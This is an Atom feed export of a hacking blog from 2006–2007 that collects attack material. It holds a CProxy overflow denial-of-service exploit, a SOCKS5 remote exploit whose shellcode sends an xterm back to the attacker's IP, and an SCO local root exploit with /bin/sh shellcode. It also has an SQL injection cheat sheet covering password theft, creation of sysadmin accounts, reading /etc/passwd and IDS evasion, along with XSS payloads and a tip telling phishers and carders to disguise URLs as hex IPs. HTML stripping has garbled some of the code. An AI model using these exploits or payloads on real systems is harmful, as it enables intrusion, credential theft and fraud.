tag:blogger.com,1999:blog-329102312011-04-21T11:35:15.282-07:00hacking + hackingn3kr0http://www.blogger.com/profile/06618592311204129552noreply@blogger.comBlogger81100tag:blogger.com,1999:blog-32910231.post-89396982383737809782007-04-13T13:24:00.000-07:002007-04-13T13:27:25.631-07:00<img style="margin: 0px auto 10px; display: block; text-align: center; width: 302px; height: 463px;" src="http://0wn3d.dk/owned/owned10.jpg" alt="" border="0" /><br /><pre>/*<br />* Remote Denial of Service for CProxy v3.3 - Service Pack 2<br />*<br />*<br />*<br />* This program xploits an overflow vulnerability in CProxy 3.3 SP2<br />* HTTP Service (8080), causing server shutdown<br />*<br />*/<br /><br />#include <stdio.h><br />#include <stdlib.h><br />#include <unistd.h><br />#include <sys h=""><br />#include <sys h=""><br />#include <netdb.h><br />#include <netinet h=""><br />#include <arpa h=""><br /><br />#define BUFFERSIZE 247<br />#define NOP 0x90<br />// If you change this values you can change EIP and EBP values<br />// to redirect to a code that you want >;)<br />#define EIP 0x61616161<br />#define EBP 0x61616161<br /><br />void usage(char *progname) {<br />fprintf(stderr,"Usage: %s <hostname> [eip] [ebp]\n",progname);<br />exit(1);<br />}<br /><br />int main(int argc, char **argv) {<br />char *ptr,buffer[BUFFERSIZE], remotedos[1024];<br />unsigned long *long_ptr,eip=EIP, ebp=EBP;<br />int aux,sock;<br />struct sockaddr_in sin;<br />unsigned long ip;<br />struct hostent *he;<br /><br />fprintf(stderr,"\n-= Remote DoS for CProxy v3.3 ServicePack 2 - (C) |[TDP]| - H13 Team =-\n");<br /><br />if (argc<2)>=3) eip+=atol(argv[2]);<br /><br />if (argc>=4) ebp+=atol(argv[3]);<br /><br />ptr=buffer;<br />memset(ptr,0,sizeof(buffer));<br />memset(ptr,NOP,sizeof(buffer)-8);<br />ptr+=sizeof(buffer)-8;<br />long_ptr=(unsigned long*)ptr;<br />*(long_ptr++) = ebp;<br />*(long_ptr++) = eip;<br />ptr=(char *)long_ptr;<br />*ptr='\0';<br /><br />bzero(remotedos, sizeof(remotedos));<br />snprintf(remotedos, sizeof(remotedos), "GET http://%s HTTP/1.0\r\n\r\n\r\n",buffer);<br /><br />if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < he =" gethostbyname(argv[1]))" ip =" *(unsigned">h_addr;<br />} else {<br />if ((ip = inet_addr(argv[1])) == NULL) {<br />perror("inet_addr()");<br />return -1;<br />}<br />}<br /><br />sin.sin_family = AF_INET;<br />sin.sin_addr.s_addr = ip;<br />sin.sin_port = htons(8080);<br /><br />fprintf(stderr,"\nEngaged...\n");<br />if (connect(sock, (struct sockaddr *)&amp;sin, sizeof(sin)) <></hostname></arpa></netinet></netdb.h></sys></sys></unistd.h></stdlib.h></stdio.h></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/32910231-8939698238373780978?l=y0ure0wn3d.blogspot.com' alt='' /></div>n3kr0http://www.blogger.com/profile/06618592311204129552noreply@blogger.com0tag:blogger.com,1999:blog-32910231.post-1163357674188016642006-11-12T10:52:00.000-08:002006-11-12T11:03:27.500-08:00<div style="text-align: justify;"><pre>product :Speedwiki 2.0<br />vendor site: http://speedywiki.sourceforge.net/<br />risk:critical<br /><br /><br />a user logged in , can upload a PHP script on the server , by the upload script , there's actually no upload filter on this cms<br />path : /speedywiki/index.php?upload=1<br /><br />xss get :<br />/index.php?showRevisions='"><script>alert(document.cookie)</script><br /><br /><br /><br /><br />full path disclosure :<br />/speedywiki/index.php?showRevisions[]=<br />/speedywiki/index.php?searchText[]=<br />/speedywiki/upload.php<br /><br />laurent gaffié &amp; benjamin mossé<br />http://s-a-p.ca/<br />contact: saps.audit@gmail.com</pre></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/32910231-116335767418801664?l=y0ure0wn3d.blogspot.com' alt='' /></div>n3kr0http://www.blogger.com/profile/06618592311204129552noreply@blogger.com0tag:blogger.com,1999:blog-32910231.post-1162876976976727582006-11-06T21:17:00.000-08:002006-11-06T21:22:56.983-08:00va para todos akellos dedikados al phishing o karders --> pasar la IP a hexadecimal de la web a disfrazar ej. www.google.com --> I.P. dir --> 72.14.207.99 --> hexadecimal <a href="http://0x48.0x0e.0xcf.0x63">http://0x48.0x0e.0xcf.0x63</a> click para ver ;) karders, su vida vuelve a tomar un nuevo giro lollll<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/32910231-116287697697672758?l=y0ure0wn3d.blogspot.com' alt='' /></div>n3kr0http://www.blogger.com/profile/06618592311204129552noreply@blogger.com0tag:blogger.com,1999:blog-32910231.post-1162876397406675542006-11-06T21:12:00.000-08:002006-11-06T21:13:17.413-08:00link a explotar: http://host.domain.tld/wp-admin/options-general.php?page=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E<br /><br />Fix:<br /><br /><pre>$ <em>svn diff wp-admin/admin.php</em> Index: wp-admin/admin.php<br />===================================================================<br />— wp-admin/admin.php (revision 3513)<br />+++ wp-admin/admin.php (working copy) @@ -61,7 +61,7 @@<br />} if (! file_exists(ABSPATH . “wp-content/plugins/$plugin_page”))<br /><span style="color:red;">- die(sprintf(__(’Cannot load %s.’), $plugin_page));</span><br /><span style="color:green;">+ die(sprintf(__(’Cannot load %s.’), htmlentities($plugin_page)));</span><br />if (! isset($_GET[’noheader’])) require_once(ABSPATH . ‘/wp-admin/admin-header.php’);</pre><br />;)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/32910231-116287639740667554?l=y0ure0wn3d.blogspot.com' alt='' /></div>n3kr0http://www.blogger.com/profile/06618592311204129552noreply@blogger.com0tag:blogger.com,1999:blog-32910231.post-1155844547642428062006-08-17T12:55:00.000-07:002006-08-17T12:55:47.646-07:00Oracle<br />-->SYS.USER_OBJECTS (USEROBJECTS)<br />-->SYS.USER_VIEWS<br />-->SYS.USER_TABLES<br />-->SYS.USER_VIEWS<br />-->SYS.USER_TAB_COLUMNS<br />-->SYS.USER_CATALOG<br />-->SYS.USER_TRIGGERS<br />-->SYS.ALL_TABLES<br />-->SYS.TAB<br /><br />MySQL<br />-->mysql.user<br />-->mysql.host<br />-->mysql.db<br /><br />MS access<br />-->MsysACEs<br />-->MsysObjects<br />-->MsysQueries<br />-->MsysRelationships<br /><br />MS SQL Server<br />-->sysobjects<br />-->syscolumns<br />-->systypes<br />-->sysdatabases<br /><br />5.Grabbing passwords<br /><br />'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --<br /><br />' and 1 in (select var from temp)--<br /><br />' ; drop table temp --<br /><br />6.Create DB accounts.<br /><br />MS SQL<br />exec sp_addlogin 'name' , 'password'<br />exec sp_addsrvrolemember 'name' , 'sysadmin'<br /><br />MySQL<br />INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))<br /><br />Access<br />CRATE USER name IDENTIFIED BY 'pass123'<br /><br />Postgres (requires Unix account)<br />CRATE USER name WITH PASSWORD 'pass123'<br /><br />Oracle<br />CRATE USER name IDENTIFIED BY pass123<br /> TEMPORARY TABLESPACE temp<br /> DEFAULT TABLESPACE users;<br />GRANT CONNECT TO name;<br />GRANT RESOURCE TO name;<br /><br />7.MySQL OS Interaction<br /><br />- ' union select 1,load_file('/etc/passwd'),1,1,1;<br /><br />8.Server name and config.<br /><br />- ' and 1 in (select @@servername)--<br />- ' and 1 in (select servername from master.sysservers)--<br /><br />9.Retrieving VNC password from registry.<br /><br />- '; declare @out binary(8)<br />- exec master..xp_regread<br />- @rootkey = 'HKEY_LOCAL_MACHINE',<br />- @key = 'SOFTWARE\ORL\WinVNC3\Default',<br />- @value_name='password',<br />- @value = @out output<br />- select cast (@out as bigint) as x into TEMP--<br />- ' and 1 in (select cast(x as varchar) from temp)--<br /><br />10.IDS Signature Evasion.<br />Evading ' OR 1=1 Signature<br /><br />- ' OR 'unusual' = 'unusual'<br />- ' OR 'something' = 'some'+'thing'<br />- ' OR 'text' = N'text'<br />- ' OR 'something' like 'some%'<br />- ' OR 2 > 1<br />- ' OR 'text' > 't'<br />- ' OR 'whatever' in ('whatever')<br />- ' OR 2 BETWEEN 1 and 3<br /><br />11.mySQL Input Validation Circumvention using Char().<br /><br />Inject without quotes (string = "%"):<br />--> ' or username like char(37);<br />Inject with quotes (string="root"):<br />--> ' union select * from users where login = char(114,111,111,116);<br />load files in unions (string = "/etc/passwd"):<br />-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;<br />Check for existing files (string = "n.ext"):<br />-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));<br /><br />12.IDS Signature Evasion using comments.<br /><br />-->'/**/OR/**/1/**/=/**/1<br />-->Username:' or 1/*<br />-->Password:*/=1--<br />-->UNI/**/ON SEL/**/ECT<br />-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'<br />-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')<br /><br />13.Strings without quotes.<br />--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)<br /><br />Greets: kaneda, modem, wildcard, #black and pulltheplug.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/32910231-115584454764242806?l=y0ure0wn3d.blogspot.com' alt='' /></div>n3kr0http://www.blogger.com/profile/06618592311204129552noreply@blogger.com0tag:blogger.com,1999:blog-32910231.post-1155844252113361012006-08-17T12:50:00.000-07:002006-08-17T12:50:52.126-07:00<pre>/*<br />* <span style="font-size:180%;"><span style="font-weight: bold;">!!!! Private do not distribute !!!!</span></span><br />*<br />* <1080r2.c> defintive socks5 remote exploit / linux x86<br />*<br />* Usage:<br />* $ xhost +<br />* $ ./1080r2 <host> <your_ip> [offset]<br />* => And wait a xterm to be sent back to you...<br />*<br />* Vulnerables: (offset)<br />* socks5-v1.0r10 (compiled on a turbolinux 4.0.5) => 0<br />* socks5-v1.0r9 (compiled on a turbolinux 4.0.5) => 0<br />* socks5-v1.0r8 (compiled on a turbolinux 4.0.5) => 0<br />* socks5-v1.0r10 (compiled on a redhat 6.0) => 400<br />* socks5-s5watch-1.0r9-2 (redhat-contrib) => no?<br />* socks5-0.17-1 (redhat 4.2) => no<br />* socks5-1.0r10-5 (redhat-contrib) => no??<br />* socks5-server-1.0r6-8TL (TurboContrib) => no??<br />*<br />*<br />*/<br /> <br />#include <stdio.h><br />#include <stdlib.h><br />#include <string.h><br />#include <signal.h><br />#include <unistd.h><br />#include <sys/time.h><br />#include <sys/types.h><br />#include <sys/socket.h><br />#include <netinet/in.h><br />#include <netinet/in_systm.h><br />#include <netinet/ip.h><br />#include <netdb.h><br />#include <arpa/inet.h><br />#include <arpa/nameser.h><br /><br />#define NOP 0x90<br />#define MAXLEN 2000<br />#define OFFSET 0x7fffd99d // TurboLinux 4.0.5<br />#define ALIGN 3<br />#define LENGTH 195<br /><br />char hell[120]=<br />"\xeb\x29" // jmp 0x13<br />"\x5e" // popl %esi<br />"\x89\x76\x30" // movl %esi,0x30(%esi)<br />"\x89\xf0" // movl %esi,%eax<br />"\x83\xc0\x15" // addl $0x15,%eax<br />"\x89\x46\x34" // movl %eax,0x34(%esi)<br />"\x83\xc0\x09" // addl $0x9,%eax<br />"\x89\x46\x38" // movl %eax,0x38(%esi)<br />"\x31\xc0" // xorl %eax,%eax<br />"\x89\x46\x3c" // movl %eax,0x3c(%esi)<br />"\x88\x46\x14" // movb %eax,0x14(%esi)<br />"\x88\x46\x1d" // movb %eax,0x1d(%esi)<br />"\xb0\x0b" // movb $0xb,%al<br />"\x89\xf3" // movl %esi,%ebx<br />"\x8d\x4e\x30" // leal 0x30(%esi),%ecx<br />"\x8d\x56\x3c" // leal 0x3c(%esi),%edx<br />"\xcd\x80" // int $0x80<br />"\xe8\xd2\xff\xff\xff" // call -0x22<br />"/usr/X11R6/bin/xtermA"<br />"-displayA"<br />//"127.0.0.1:0"<br />;<br /><br /><br />char buf[MAXLEN];<br /><br />main(int argc, char *argv[]) {<br />struct sockaddr_in to;<br />char buff[1000];<br />int sd;<br />int pktlen;<br />struct hostent *hp;<br />int i;<br />long *addr;<br />int off;<br />int alin;<br />int len;<br />int offset;<br /><br />if(argc==4) {<br />offset=atoi(argv[3]);<br />} else {<br /> if(argc==3) {<br /> offset=0;<br /> } else {<br /> printf("Uso: ./1080r2 <host> <your_ip> [offset]\n");<br /> exit(0); }<br />}<br /><br />len=LENGTH;<br />off=OFFSET+offset;<br />alin=ALIGN;<br /> <br />strcat(hell,argv[2]);<br />strcat(hell,":0");<br /><br />memset(buf,NOP,len);<br />memcpy(buf+len-strlen(hell)-1,hell,strlen(hell));<br /> <br />addr=(long *)(buf+alin);<br />for (i=0;i<46;i+=4)<br />*(addr++) = off;<br /> <br />buf[len-1]='\0';<br /> <br />to.sin_family=AF_INET;<br />to.sin_port = htons(1080);<br /><br />if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {<br /> perror("gethostbyname()");<br /> exit(0); }<br /><br />if((sd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {<br /> perror("socket()");<br /> exit(0); }<br /><br />memcpy((char *)&to.sin_addr,(char *)hp->h_addr,hp->h_length);<br /><br />if(connect(sd,(struct sockaddr *)&to,sizeof(to))!=0) {<br /> perror("connect()");<br /> exit(0); }<br />printf("Connect: Ready to send overflow...\n");<br />//getchar();<br /><br />// inicio<br /><br />pktlen=3;<br />buff[0]=0x5; // SOCKS version 5<br />buff[1]=0x1; // one authentication type...<br /><br />buff[2]=0x0; // no authentication<br />//buff[2]=0x2; // userpass<br /><br />if(write(sd, buff, pktlen)!=pktlen) {<br />perror("write error");<br />exit(-1); }<br /><br />if(read(sd, buff, 2)!=2) {<br /> perror("read error");<br /> exit(-1); }<br /> <br />if(buff[0] != 0x5) {<br /> printf("invalid response\n");<br /> exit(-1); }<br /><br />if(buff[1] == 0xf) {<br /> printf("proxy requires authenticationn");<br /> exit(-1); }<br /><br />if(buff[1] != 0x0) {<br /> printf("proxy returned an invalid authentication type\n");<br /> exit(-1); }<br /><br />// autentificacion<br />/*<br />printf("\ndone\n");<br />printf("sending autentificacion request...");<br /><br />pktlen=snprintf(buff, sizeof(buff), "\x01%c%s%c%s",<br /> strlen(username), username, strlen(password), password);<br /> <br />send(sd, buff, pktlen, 0);<br /><br />recv(sd, buff, 2, 0);<br /><br />if(buff[1] != 0x00) {<br /> printf("username/password invalid\n");<br /> exit (1); }<br />*/ <br />// conexion <br /> <br />for(i=1;i<=len;i++)<br /> putchar(buf[i]);<br /> <br />printf("\ndone\n");<br />printf("sending connection request...");<br /><br />pktlen=snprintf(buff, sizeof(buff), "\x05\x01%c\x03%c%s%c%c",<br /> 0x00, strlen(buf), buf, 0x11, 0x22);<br /> <br />if(write(sd, buff, pktlen)!=pktlen) {<br /> perror("write error");<br /> exit(-1); }<br /><br />if(read(sd, buff, 4)!=4) {<br /> perror("read error (1)");<br /> exit(-1); }<br /><br /> switch(buff[1]) {<br /> case 0: printf("succeeded\n"); break;<br /> case 1: printf("general SOCKS server failure\n"); exit(-1);<br /> case 2: printf("connection not allowed by ruleset\n"); exit(-1);<br /> case 3: printf("network unreachable\n"); exit(-1);<br /> case 4: printf("host unreachable\n"); exit(-1);<br /> case 5: printf("connection refused\n"); exit(-1);<br /> case 6: printf("TTL expired\n"); exit(-1);<br /> case 7: printf("command not supported (?)\n"); exit(-1);<br /> case 8: printf("address type not supported\n"); exit(-1);<br /> default: printf("returned unknown error code\n"); exit(-1);<br /> }<br /> <br />} </pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/32910231-115584425211336101?l=y0ure0wn3d.blogspot.com' alt='' /></div>n3kr0http://www.blogger.com/profile/06618592311204129552noreply@blogger.com0tag:blogger.com,1999:blog-32910231.post-1155844162476753312006-08-17T12:37:00.000-07:002006-08-17T12:49:27.726-07:00<pre>/*<br />* <scotermx.c> Local root exploit<br />*<br />* Usage:<br />* $ cc scotermx.c -o scotermx<br />* $ scoterm<br />* $ /usr/bin/X11/scoterm -geometry `scotermx 0`<br />* or<br />* $ /usr/bin/X11/scoterm -display 1.1.1.1:0 -geometry `scotermx 2500`<br />*<br />* Note: scoterm need to be run from a valid x-display<br />*<br />* By: The Dark Raver of t0s (Murcia/Spain - 21/6/99)<br />*<br />* <http:> - <darkraver@t0s.org><br />*<br />*/<br /><br /><br />#include <stdlib.h><br />#include <stdio.h><br /><br /><br />char hell[]=<br />"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"<br />"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"<br />"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";<br /><br />/*<br />char hell[]=<br />"\xeb\x1b" // start: jmp uno<br />"\x5e" // dos: popl %esi<br />"\x31\xdb" // xorl %ebx,%ebx<br />"\x89\x5e\x07" // movb %bl,0x7(%esi)<br />"\x89\x5e\x0c" // movl %ebx,0x0c(%esi)<br />"\x88\x5e\x11" // movb %bl,0x11(%esi)<br />"\x31\xc0" // xorl %eax,%eax<br />"\xb0\x3b" // movb $0x3b,%al<br />"\x8d\x7e\x07" // leal 0x07(%esi),%edi<br />"\x89\xf9" // movl %edi,%ecx<br />"\x53" // pushl %ebx<br />"\x51" // pushl %ecx<br />"\x56" // pushl %esi<br />"\x56" // pushl %esi<br />"\xeb\x10" // jmp execve<br />"\xe8\xe0\xff\xff\xff" // uno: call dos<br />"/bin/sh"<br />"\xaa\xaa\xaa\xaa"<br />"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0<br />*/<br /><br /> <br />#define OFF 0x80452ff // SCO OpenServer 5.0.4<br />#define ALINEA 1<br />#define LEN 2000<br /> <br /><br />int main(int argc, char *argv[]) {<br /><br />int offset=0;<br />char buf[LEN];<br />int i;<br /><br />if(argc <>\n");<br /> exit(0); }<br />else {<br /> offset=atoi(argv[1]); }<br /><br />memset(buf,0x90,LEN);<br />memcpy(buf+1000,hell,strlen(hell));<br />for(i=1100+ALINEA;i<len-4;i+=4) int="" i="OFF+offset;" 0=""></len-4;i+=4)></offset></stdio.h></stdlib.h></darkraver@t0s.org></http:></scotermx.c></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/32910231-115584416247675331?l=y0ure0wn3d.blogspot.com' alt='' /></div>n3kr0http://www.blogger.com/profile/06618592311204129552noreply@blogger.com0tag:blogger.com,1999:blog-32910231.post-1155842913000588662006-08-17T12:27:00.000-07:002006-08-17T12:35:56.876-07:00fuck off!<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/32910231-115584291300058866?l=y0ure0wn3d.blogspot.com' alt='' /></div>n3kr0http://www.blogger.com/profile/06618592311204129552noreply@blogger.com0